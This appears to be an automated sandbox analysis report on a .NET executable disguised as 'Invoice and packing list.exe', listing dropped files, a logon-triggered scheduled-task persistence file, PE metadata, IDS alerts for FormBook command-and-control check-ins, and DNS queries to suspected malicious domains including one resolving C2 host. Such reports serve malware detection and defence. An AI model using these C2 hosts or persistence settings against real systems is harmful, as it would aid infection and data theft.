Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sjnqsbi.4vb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgz1irpp.xtl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gam1wwvb.ncg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4lwyg0t.0ye.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thy0abgh.3hw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upntwxvc.m4b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfrkahtd.vjx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp2498.tmp

Download File

Process:	C:\Users\user\Desktop\Invoice and packing list.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1581
Entropy (8bit):	5.101537842341254
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cgergYrFdOFzOzN33ODOiDdKrsuTcv
MD5:	F8D38C74EABEDCB390F1D96DDEAB1F1B
SHA1:	83B78D1D8564AB1AEBC05B4ECADEE15A35963684
SHA-256:	7E8B4A77C1CDA487F763868DBADF13AFDC11AC0188D37582955A7D3226ECA03E
SHA-512:	18ED6E50AF353670B3E20B439860C56EF7ADF6DAAA887D219FFFCDB5293D6B7B110A5DDA19EF9BF4FF33B6907AC1408B9987BFBACC0DA3EA22676F3DA4E2F7AB
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp36E8.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\utlAHqvw.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1581
Entropy (8bit):	5.101537842341254
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cgergYrFdOFzOzN33ODOiDdKrsuTcv
MD5:	F8D38C74EABEDCB390F1D96DDEAB1F1B
SHA1:	83B78D1D8564AB1AEBC05B4ECADEE15A35963684
SHA-256:	7E8B4A77C1CDA487F763868DBADF13AFDC11AC0188D37582955A7D3226ECA03E
SHA-512:	18ED6E50AF353670B3E20B439860C56EF7ADF6DAAA887D219FFFCDB5293D6B7B110A5DDA19EF9BF4FF33B6907AC1408B9987BFBACC0DA3EA22676F3DA4E2F7AB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\utlAHqvw.exe

Download File

Process:	C:\Users\user\Desktop\Invoice and packing list.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	856064
Entropy (8bit):	7.7278867165585305
Encrypted:	false
SSDEEP:	24576:C8yNK1t4NK1tOqLB94uH/Stkd3uRStXvfFQ:Rhz9fvj
MD5:	735A274389AF85C4B4F6CCD684B1B30A
SHA1:	2AE6619FEBB0C9F4D318DAA9F28172C2ED9ED4DA
SHA-256:	BCFEB4EC31E731899A0DDD0A608AA7ECBFBDBF37F4AC3810B275BA6905A1969B
SHA-512:	959BD09B752128AE08262BC7803B857099E3727F025F380A918F5B46AC64384180224EF40CC086C795F54DBB8621798B3BA95362805BCCBC634800FC626BF14A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f$... ...@....@.. ....................................@..................................$..O....@.......................`......`...p............................................ ............... ..H............text...\|.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................F$......H...........a......S....................................................0..L.........}.....(.......(......(............s .....(!....o".....(#....o$.....(%.....0............}........(&........('.....,5...(............s .....(.....o".....(.....o$....85....r...p.Y...((...o)...tY.......(..........9.....s.........s+...s,...o-......o!...r...po...........,$..(!.....o!...r...po....s....o/........o0...(1.......o2...(3.......o4...(5.......o6...(7.......o8...(9.......o:...(;.........

C:\Users\user\AppData\Roaming\utlAHqvw.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Invoice and packing list.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7278867165585305
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Invoice and packing list.exe
File size:	856'064 bytes
MD5:	735a274389af85c4b4f6ccd684b1b30a
SHA1:	2ae6619febb0c9f4d318daa9f28172c2ed9ed4da
SHA256:	bcfeb4ec31e731899a0ddd0a608aa7ecbfbdbf37f4ac3810b275ba6905a1969b
SHA512:	959bd09b752128ae08262bc7803b857099e3727f025f380a918f5b46ac64384180224ef40cc086c795f54dbb8621798b3ba95362805bccbc634800fc626bf14a
SSDEEP:	24576:C8yNK1t4NK1tOqLB94uH/Stkd3uRStXvfFQ:Rhz9fvj
TLSH:	060501543A8AEF03C0925BF41821E2F46B745E8CA961D7079FEA3EEF7C767042A41653
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f$... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4d2466
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE0FECAF2 [Sat Aug 13 18:01:22 2089 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
call far 0000h : 003E9999h
aas
int CCh
dec esp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd2412	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x594	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xcff60	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd047c	0xd0600	2caae0e67c0d7e9124957b65e420903f	False	0.9030912567486503	data	7.7343315991965556	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd4000	0x594	0x600	253296234f4c813479ef82b3c31db87f	False	0.4140625	data	4.037714760781472	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd6000	0xc	0x200	69e7ddfeb9eb66ca9189ff819c1ce5bf	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xd4090	0x304	data			0.4326424870466321
RT_MANIFEST	0xd43a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T15:31:02.807803+0100	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49980	121.254.178.252	80	TCP
2025-01-13T15:31:02.807803+0100	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49980	121.254.178.252	80	TCP
2025-01-13T15:31:02.807803+0100	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49980	121.254.178.252	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 15:26:52.514334917 CET	49675	443	192.168.2.5	23.1.237.91
Jan 13, 2025 15:26:52.514358044 CET	49674	443	192.168.2.5	23.1.237.91
Jan 13, 2025 15:26:52.592421055 CET	49673	443	192.168.2.5	23.1.237.91
Jan 13, 2025 15:27:02.186085939 CET	49675	443	192.168.2.5	23.1.237.91
Jan 13, 2025 15:27:02.264254093 CET	49674	443	192.168.2.5	23.1.237.91
Jan 13, 2025 15:27:02.367199898 CET	49673	443	192.168.2.5	23.1.237.91
Jan 13, 2025 15:27:03.854537010 CET	443	49703	23.1.237.91	192.168.2.5
Jan 13, 2025 15:27:03.854681015 CET	49703	443	192.168.2.5	23.1.237.91
Jan 13, 2025 15:31:02.218029022 CET	49980	80	192.168.2.5	121.254.178.252
Jan 13, 2025 15:31:02.223663092 CET	80	49980	121.254.178.252	192.168.2.5
Jan 13, 2025 15:31:02.223733902 CET	49980	80	192.168.2.5	121.254.178.252
Jan 13, 2025 15:31:02.223870039 CET	49980	80	192.168.2.5	121.254.178.252
Jan 13, 2025 15:31:02.228703022 CET	80	49980	121.254.178.252	192.168.2.5
Jan 13, 2025 15:31:02.717003107 CET	49980	80	192.168.2.5	121.254.178.252
Jan 13, 2025 15:31:02.766321898 CET	80	49980	121.254.178.252	192.168.2.5
Jan 13, 2025 15:31:02.807677984 CET	80	49980	121.254.178.252	192.168.2.5
Jan 13, 2025 15:31:02.807802916 CET	49980	80	192.168.2.5	121.254.178.252

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 15:27:36.452769995 CET	58220	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:27:36.462280035 CET	53	58220	1.1.1.1	192.168.2.5
Jan 13, 2025 15:27:57.358510017 CET	62453	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:27:57.380866051 CET	53	62453	1.1.1.1	192.168.2.5
Jan 13, 2025 15:28:16.827616930 CET	55611	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:28:16.852360964 CET	53	55611	1.1.1.1	192.168.2.5
Jan 13, 2025 15:28:37.174616098 CET	54547	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:28:37.183665037 CET	53	54547	1.1.1.1	192.168.2.5
Jan 13, 2025 15:28:57.593000889 CET	64334	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:28:57.603214025 CET	53	64334	1.1.1.1	192.168.2.5
Jan 13, 2025 15:29:18.182234049 CET	55363	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:29:18.191292048 CET	53	55363	1.1.1.1	192.168.2.5
Jan 13, 2025 15:29:39.363418102 CET	49915	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:29:39.373758078 CET	53	49915	1.1.1.1	192.168.2.5
Jan 13, 2025 15:29:59.811392069 CET	63931	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:29:59.820288897 CET	53	63931	1.1.1.1	192.168.2.5
Jan 13, 2025 15:30:20.426647902 CET	56328	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:30:20.441931963 CET	53	56328	1.1.1.1	192.168.2.5
Jan 13, 2025 15:30:41.279081106 CET	49323	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:30:41.450048923 CET	53	49323	1.1.1.1	192.168.2.5
Jan 13, 2025 15:31:01.733342886 CET	53285	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:31:02.217175007 CET	53	53285	1.1.1.1	192.168.2.5
Jan 13, 2025 15:31:22.920675039 CET	56640	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:31:22.931165934 CET	53	56640	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 15:27:36.452769995 CET	192.168.2.5	1.1.1.1	0xff05	Standard query (0)	www.ive-neurozoom.store	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:27:57.358510017 CET	192.168.2.5	1.1.1.1	0x13d6	Standard query (0)	www.yselection.xyz	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:16.827616930 CET	192.168.2.5	1.1.1.1	0xcd6f	Standard query (0)	www.eepvid.xyz	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:37.174616098 CET	192.168.2.5	1.1.1.1	0x7735	Standard query (0)	www.gmgslzdc.sbs	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:57.593000889 CET	192.168.2.5	1.1.1.1	0xa7cc	Standard query (0)	www.aportsystems.store	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:29:18.182234049 CET	192.168.2.5	1.1.1.1	0x90b2	Standard query (0)	www.oftware-download-92806.bond	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:29:39.363418102 CET	192.168.2.5	1.1.1.1	0x79c0	Standard query (0)	www.enelog.xyz	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:29:59.811392069 CET	192.168.2.5	1.1.1.1	0x1db9	Standard query (0)	www.inggraphic.pro	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:30:20.426647902 CET	192.168.2.5	1.1.1.1	0x5c2a	Standard query (0)	www.avid-hildebrand.info	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:30:41.279081106 CET	192.168.2.5	1.1.1.1	0xb54	Standard query (0)	www.aja168e.live	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:31:01.733342886 CET	192.168.2.5	1.1.1.1	0x22de	Standard query (0)	www.kkkk.shop	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:31:22.920675039 CET	192.168.2.5	1.1.1.1	0xda88	Standard query (0)	www.ndogaming.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 15:27:13.196739912 CET	1.1.1.1	192.168.2.5	0x9873	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:27:13.196739912 CET	1.1.1.1	192.168.2.5	0x9873	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:27:15.349657059 CET	1.1.1.1	192.168.2.5	0x16e7	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 15:27:15.349657059 CET	1.1.1.1	192.168.2.5	0x16e7	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:27:16.262675047 CET	1.1.1.1	192.168.2.5	0xb69	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 15:27:16.262675047 CET	1.1.1.1	192.168.2.5	0xb69	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:27:36.462280035 CET	1.1.1.1	192.168.2.5	0xff05	Name error (3)	www.ive-neurozoom.store	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:27:57.380866051 CET	1.1.1.1	192.168.2.5	0x13d6	Name error (3)	www.yselection.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:16.852360964 CET	1.1.1.1	192.168.2.5	0xcd6f	Name error (3)	www.eepvid.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:37.183665037 CET	1.1.1.1	192.168.2.5	0x7735	Name error (3)	www.gmgslzdc.sbs	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:57.603214025 CET	1.1.1.1	192.168.2.5	0xa7cc	Name error (3)	www.aportsystems.store	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:29:18.191292048 CET	1.1.1.1	192.168.2.5	0x90b2	Name error (3)	www.oftware-download-92806.bond	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:29:39.373758078 CET	1.1.1.1	192.168.2.5	0x79c0	Name error (3)	www.enelog.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:29:59.820288897 CET	1.1.1.1	192.168.2.5	0x1db9	Name error (3)	www.inggraphic.pro	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:30:20.441931963 CET	1.1.1.1	192.168.2.5	0x5c2a	Name error (3)	www.avid-hildebrand.info	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:30:41.450048923 CET	1.1.1.1	192.168.2.5	0xb54	Name error (3)	www.aja168e.live	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:31:02.217175007 CET	1.1.1.1	192.168.2.5	0x22de	No error (0)	www.kkkk.shop		121.254.178.252	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:31:22.931165934 CET	1.1.1.1	192.168.2.5	0xda88	Name error (3)	www.ndogaming.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.kkkk.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.5	49980	121.254.178.252	80

Timestamp	Bytes transferred	Direction	Data
